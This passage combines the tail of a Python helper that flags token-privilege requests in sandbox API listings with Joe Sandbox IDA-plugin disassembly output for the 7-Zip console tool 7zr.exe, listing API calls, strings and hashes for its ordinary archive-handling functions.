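            if not c.api.startswith("LookupPrivilegeValue") or len(c.args) < 2:
                continue
            privilege = c.args[1]
            if not privilege.startswith("Se"):
                continue  # the plugin did not recover the name as a string
            j = next((k for k in range(i + 1, len(fn))
                      if fn[k].api == "AdjustTokenPrivileges"), None)
            if j is None:
                continue
            checked = j + 1 < len(fn) and fn[j + 1].api == "GetLastError"
            findings.append(PrivilegeEnable(privilege, fn[0].ref, c.ref, fn[j].ref, checked))
    return findings


def describe(findings):
    """One triage-note line per finding."""
    lines = []
    for f in findings:
        effect = PRIVILEGE_EFFECT.get(f.privilege, "effect not in table")
        check = "checks GetLastError" if f.result_checked else "no result check"
        lines.append(f"{f.first_call:08X}: enables {f.privilege} ({effect}); "
                     f"AdjustTokenPrivileges at {f.adjust_ref:08X}, {check}")
    return lines


if __name__ == "__main__":
    for line in describe(find_privilege_enables(parse_calls(SAMPLE))):
        print(line)
```

                        The GetLastError call directly after AdjustTokenPrivileges is worth recording: AdjustTokenPrivileges returns success even when the token does not hold the requested privilege and only signals that through ERROR_NOT_ALL_ASSIGNED in the last-error value, so a caller that reads GetLastError (both functions here do) actually learns whether the privilege was enabled. Run the script against a report page's listings to get one line per privilege request, then judge each by the module it lives in and the privilege named.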
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C81F1
                          • Part of subcall function 003CF749: _CxxThrowException.MSVCRT(?,00434A58), ref: 003CF792
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionH_prologThrow
                        • String ID:
                        • API String ID: 461045715-3916222277
                        • Opcode ID: 7456336a28308a6474dba2585b1117fb242dd8b8f70b028f08a3160b475f55dd
                        • Instruction ID: 347a7a7edb59e5d00fa412f921d28b345782c9048930fdfdfaf76ac8de4634de
                        • Opcode Fuzzy Hash: 7456336a28308a6474dba2585b1117fb242dd8b8f70b028f08a3160b475f55dd
                        • Instruction Fuzzy Hash: 65927C31900249DFDB16DFA8C844FAEBBB5BF09304F25449DE805EB292CB75AE45CB61
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038686D
                          • Part of subcall function 00386848: FindClose.KERNELBASE(00000000,?,00386880), ref: 00386853
                        • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 003868A5
                        • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 003868DE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: Find$FileFirst$CloseH_prolog
                        • String ID:
                        • API String ID: 3371352514-0
                        • Opcode ID: 12da1922dce87b6b6c2a41fd7863d79cbd53d112b08385b6e8b479404d5cef55
                        • Instruction ID: 862488cd7e513a42033753c9e9d2832d88aff9defb740f6153c89ec6ebac3ab5
                        • Opcode Fuzzy Hash: 12da1922dce87b6b6c2a41fd7863d79cbd53d112b08385b6e8b479404d5cef55
                        • Instruction Fuzzy Hash: 5511DD315003099BCF22FF64D8929EDB778EF50324F2042A9E9A49B191DB319E86DB40

                        Control-flow Graph

                        Control-flow graph for the function at 3ba013 (nodes 3ba013-3bacb5): a results-summary printer made almost entirely of fputs calls, each guarded by a counter check, with _CxxThrowException cleanup paths; the strings it emits are the ones listed under Similarity for this function. The raw node and edge listing is omitted.
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$ExceptionThrow
                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&D$p&D$N
                        • API String ID: 3665150552-3822028184
                        • Opcode ID: 87a31a7ce1c5c335f2706b1ed27f32bad133c43d54053d87998dc706be4a5d67
                        • Instruction ID: e79b84a1cdcd3b7acce6c799a2d603491ffbe8b13fa8f6700336de0758bf27b1
                        • Opcode Fuzzy Hash: 87a31a7ce1c5c335f2706b1ed27f32bad133c43d54053d87998dc706be4a5d67
                        • Instruction Fuzzy Hash: F4529C31A04658DFCF26EBA4C885BEDFBB5AF44308F1041DAE149AB691DB746E84CF11

                        Control-flow Graph

                        Control-flow graph for the function at 3ba42c (nodes 3ba42c-3bacb5): prints "Scanning the drive for archives:" via fputs, then falls into the same summary-printing tail (3ba546 onward) as the function above. The raw node and edge listing is omitted.
                        APIs
                        • fputs.MSVCRT(Scanning the drive for archives:), ref: 003BA43E
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputcfputs
                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&D$p&D$!"$N
                        • API String ID: 269475090-2375712579

                        Control-flow Graph

                        APIs
                          • Part of subcall function 003BB5B1: fputs.MSVCRT ref: 003BB5CA
                          • Part of subcall function 003BB5B1: fputs.MSVCRT ref: 003BB5E1
                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 003B99BD
                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 003B99C4
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 003B9A77
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 003B9ABB
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                        • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&D$p&D$N
                        • API String ID: 377453556-2857641154

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 00391AE3
                          • Part of subcall function 003813F5: __EH_prolog.LIBCMT ref: 003813FA
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391B2D
                        • _fileno.MSVCRT ref: 00391B3E
                        • _isatty.MSVCRT ref: 00391B47
                        • _fileno.MSVCRT ref: 00391B5D
                        • _isatty.MSVCRT ref: 00391B60
                        • _fileno.MSVCRT ref: 00391B73
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391CBB
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391DBD
                        • wcscmp.MSVCRT ref: 00391DCA
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391E04
                        • _isatty.MSVCRT ref: 00391B76
                          • Part of subcall function 003A1D73: __EH_prolog.LIBCMT ref: 003A1D78
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391E2C
                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00391E3B
                        • SetProcessAffinityMask.KERNEL32(00000000), ref: 00391E42
                        • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00391E4C
                        Strings
                        • unsupported value -stm, xrefs: 00391E19
                        • SeLockMemoryPrivilege, xrefs: 00391D28
                        • Unsupported switch postfix -bb, xrefs: 00391CA8
                        • Unsupported switch postfix for -slp, xrefs: 00391DF1
                        • : ERROR : , xrefs: 00391E52
                        • Unsupported switch postfix -stm, xrefs: 00391DAA
                        • Set process affinity mask: , xrefs: 00391D74
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                        • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                        • API String ID: 1826148334-1115009270

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 003B8017
                        • fputs.MSVCRT ref: 003B804D
                          • Part of subcall function 003B8341: __EH_prolog.LIBCMT ref: 003B8346
                          • Part of subcall function 003B8341: fputs.MSVCRT ref: 003B835B
                          • Part of subcall function 003B8341: fputs.MSVCRT ref: 003B8364
                        • fputs.MSVCRT ref: 003B807A
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                        • SysFreeString.OLEAUT32(00000000), ref: 003B81AA
                        • fputs.MSVCRT ref: 003B81CD
                        • SysFreeString.OLEAUT32(00000000), ref: 003B8267
                        • SysFreeString.OLEAUT32(00000000), ref: 003B82B1
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                        • String ID: --$----$Path$Type$Warning: The archive is open with offset
                        • API String ID: 2889736305-3797937567

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 003B676B
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B6781
                        • fputs.MSVCRT ref: 003B680B
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B6944
                          • Part of subcall function 003BC7D7: fputs.MSVCRT ref: 003BC840
                        • fputs.MSVCRT ref: 003B6851
                          • Part of subcall function 00382201: fputs.MSVCRT ref: 0038221E
                        • fputs.MSVCRT ref: 003B68D9
                        • fputs.MSVCRT ref: 003B68F6
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                        • String ID: v$8)D$8)D$Sub items Errors:
                        • API String ID: 2670240366-315136708

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 003B635E
                        • fputs.MSVCRT ref: 003B645F
                          • Part of subcall function 003BC7D7: fputs.MSVCRT ref: 003BC840
                        • fputs.MSVCRT ref: 003B6547
                        • fputs.MSVCRT ref: 003B665F
                        • fputs.MSVCRT ref: 003B66AE
                          • Part of subcall function 00381F91: fflush.MSVCRT ref: 00381F93
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog$fflushfree
                        • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                        • API String ID: 1750297421-1898165966

                        Control-flow Graph

                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00389CB3
                        • GetProcAddress.KERNEL32(00000000), ref: 00389CBA
                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00389CC8
                        • GlobalMemoryStatus.KERNEL32(?), ref: 00389CFA
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                        • API String ID: 180289352-802862622

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: CC$CC
                        • API String ID: 3519838083-1103270740

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                        • String ID:
                        • API String ID: 4012487245-0

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                        • String ID:
                        • API String ID: 279829931-0
                        • Opcode ID: 412540a660cc56d2b1ca4563a931639fde11960f226783379122d75dfd236417
                        • Instruction ID: 1e9bd29fbef1f3f5647eb41cef97d2f68e6268610d33ad9075f3dda40cff06ef
                        • Opcode Fuzzy Hash: 412540a660cc56d2b1ca4563a931639fde11960f226783379122d75dfd236417
                        • Instruction Fuzzy Hash: 72012D75A10208AFEF149FA0EC46DED77B9FF0D704B50001AF601B6262DA799411CF28

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 003A185D
                          • Part of subcall function 003A021A: __EH_prolog.LIBCMT ref: 003A021F
                          • Part of subcall function 003A062E: __EH_prolog.LIBCMT ref: 003A0633
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 003A1961
                          • Part of subcall function 003A1AA5: __EH_prolog.LIBCMT ref: 003A1AAA
                        Strings
                        • Duplicate archive path:, xrefs: 003A1A8D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID: Duplicate archive path:
                        • API String ID: 2366012087-4000988232
                        • Opcode ID: 221bb72e16b1fde8c75e914213379b354266e16d801933e61bd69472002e2afb
                        • Instruction ID: 70185088f4b66e3aaa6514b19096afda9c4cc396ade351abdd12be4ae63e109c
                        • Opcode Fuzzy Hash: 221bb72e16b1fde8c75e914213379b354266e16d801933e61bd69472002e2afb
                        • Instruction Fuzzy Hash: 3B817D31D00259DFCF16EFA4D991ADEB7B5EF09310F1041AAE5167B2A2DB30AE05CB60

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 00386C77
                        • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00386EC9
                          • Part of subcall function 00386C72: wcscmp.MSVCRT ref: 003870A5
                          • Part of subcall function 00386BF5: __EH_prolog.LIBCMT ref: 00386BFA
                          • Part of subcall function 00386BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00386C1A
                          • Part of subcall function 00386BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00386C49
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                        • String ID: :$DATA
                        • API String ID: 3316598575-2587938151
                        • Opcode ID: 40f6f7e3b657e3dad24cf5448c6f61ad7febe5cb5f8a1a4f071d35f0ef318c6f
                        • Instruction ID: dfe137d8ed80ab71f11bc63cdbfd67b37c6e133c90bf17a8908a7b4ed39af57b
                        • Opcode Fuzzy Hash: 40f6f7e3b657e3dad24cf5448c6f61ad7febe5cb5f8a1a4f071d35f0ef318c6f
                        • Instruction Fuzzy Hash: 39E117709003099BCF23FFA4C896BEEB7B6AF14314F104599E8456F2D2DB70AA49C751
                        APIs
                        • __EH_prolog.LIBCMT ref: 00396FCA
                          • Part of subcall function 00396E71: __EH_prolog.LIBCMT ref: 00396E76
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                        • API String ID: 3519838083-394804653
                        • Opcode ID: b60778b91c65314f37b66f2a6eb6caef51f649999333d93baa44f340a267b8c8
                        • Instruction ID: d2e1602bf94a8b245b28812dd6f92006f588bdcad07aefb5269baa43f65b2548
                        • Opcode Fuzzy Hash: b60778b91c65314f37b66f2a6eb6caef51f649999333d93baa44f340a267b8c8
                        • Instruction Fuzzy Hash: 9541D772E19244DBCF22DFA88451AEEFBF5BF45300F5544AED086A7241C6306E45C765
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog
                        • String ID: =
                        • API String ID: 2614055831-2525689732
                        • Opcode ID: 66d89efadb4876b45df6d325db0cfc9cd796a5bad025f981daeade79a805b909
                        • Instruction ID: 2607d86e562a93e41b34f76bbcc486f8f3d826223e1614d45d33b9f9f2cbd2d9
                        • Opcode Fuzzy Hash: 66d89efadb4876b45df6d325db0cfc9cd796a5bad025f981daeade79a805b909
                        • Instruction Fuzzy Hash: 72219032A04218EBCF16FB94E942BEEBBB9EF48314F20006BE50176191DF756E45DB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CBDBA
                          • Part of subcall function 003CBE69: __EH_prolog.LIBCMT ref: 003CBE6E
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: B$0B$DB
                        • API String ID: 3519838083-3705363898
                        • Opcode ID: 65460b8c5793d0f435f4bee1398d0f6d84368c7096f43c573139212d4b81e051
                        • Instruction ID: 7b69544e2ed3c24721ce196fbccfff142d3a04794374276a1c6022ea9e8c9cbc
                        • Opcode Fuzzy Hash: 65460b8c5793d0f435f4bee1398d0f6d84368c7096f43c573139212d4b81e051
                        • Instruction Fuzzy Hash: B711E9B0501754CFC321DF56D584A96FBE4BB18304F54C86FD0AA87712C7B4A948CB54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B8346
                        • fputs.MSVCRT ref: 003B835B
                        • fputs.MSVCRT ref: 003B8364
                          • Part of subcall function 003B83BF: __EH_prolog.LIBCMT ref: 003B83C4
                          • Part of subcall function 003B83BF: fputs.MSVCRT ref: 003B8401
                          • Part of subcall function 003B83BF: fputs.MSVCRT ref: 003B8437
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog
                        • String ID: =
                        • API String ID: 2614055831-2525689732
                        • Opcode ID: 9bd3c12e5d5e41b73ccd959a7e04b96bbb77478e54158a0252ab6c722530da90
                        • Instruction ID: 3b22e53b74acc530ee249504203a5c33ba6a13cbcf39e306c3a3c47352605078
                        • Opcode Fuzzy Hash: 9bd3c12e5d5e41b73ccd959a7e04b96bbb77478e54158a0252ab6c722530da90
                        • Instruction Fuzzy Hash: 9D012635B00104EBCB03BBA4D812AEEBB79EF84704F00401AF505561A1CF785A46DFD5
                        APIs
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,0039AB57), ref: 00417DAA
                        • GetLastError.KERNEL32(?,00000000,0039AB57), ref: 00417DBB
                        • CloseHandle.KERNELBASE(00000000,?,00000000,0039AB57), ref: 00417DCF
                        • GetLastError.KERNEL32(?,00000000,0039AB57), ref: 00417DD9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
